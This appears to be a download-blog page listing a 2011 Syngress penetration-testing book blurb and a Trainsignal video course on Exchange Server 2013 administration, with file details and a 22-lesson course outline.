Publisher: S y n g r e s s 2011 | 376 Pages | ISBN: 1597495883 | PDF | 5 MB

Ever thought of using the time-tested tactics and techniques of the ancient ninja to understand the mind of today's ninja, the hacker? As a penetration tester or security consultant you no doubt perform tests both externally and internally for your clients that include both physical and technical tests.

Sunday, March 3, 2013

Trainsignal – Exchange Server 2013 Administration (2013)


Trainsignal – Exchange Server 2013 Administration (2013)

Trainsignal – Exchange Server 2013 Administration (2013)
English | 2013 | wmv | WMV3 800x600 | WMA 1 ch 48 kbps | 10 hrs 31 min | 761 MB
Genre: Video Training

This course will take a new admin into the world of Exchange Server 2013 and bring them to the point where they feel comfortable deploying it in their environment and feel confident they can implement the various features. Students should be somewhat knowledgeable with regard to Microsoft solutions. Server solutions like DNS, certificate services and Active Directory are essential. Any legacy Exchange knowledge the student may have will be helpful for them as well.

Course Outline

Lesson 1: Course Scenario and Lab Setup
Lesson 2: An Overview of Exchange 2013
Lesson 3: An Understanding of Exchange 2013 Architecture and Server Roles
Lesson 4: Exchange 2013 Deployment Decisions and Prerequisites
Lesson 5: Installation of Exchange 2013
Lesson 6: Exchange 2013 Management Tools
Lesson 7: Exchange 2013 Organization Features
Lesson 8: Creating Recipients
Lesson 9: Managing Databases
Lesson 10: Mailbox Configuration
Lesson 11: Mail Flow Configuration
Lesson 12: Exchange 2013 Certificates
Lesson 13: Exchange 2013 Clients and Mobile Device Management
Lesson 14: Collaboration Mailbox Types
Lesson 15: Exchange 2013 Permissions
Lesson 16: Compliance Management within Exchange 2013
Lesson 17: Working with Transport Rules and Data Loss Prevention
Lesson 18: Exchange 2013 Anti-Spam and Anti-Malware Protection
Lesson 19: Exchange 2013 Unified Messaging
Lesson 20: Exchange 2013 High Availability and Site Resilience
Lesson 21: Exchange 2013 Disaster Recovery – 00:33:09
Lesson 22: Exchange 2013 Monitoring and Troubleshooting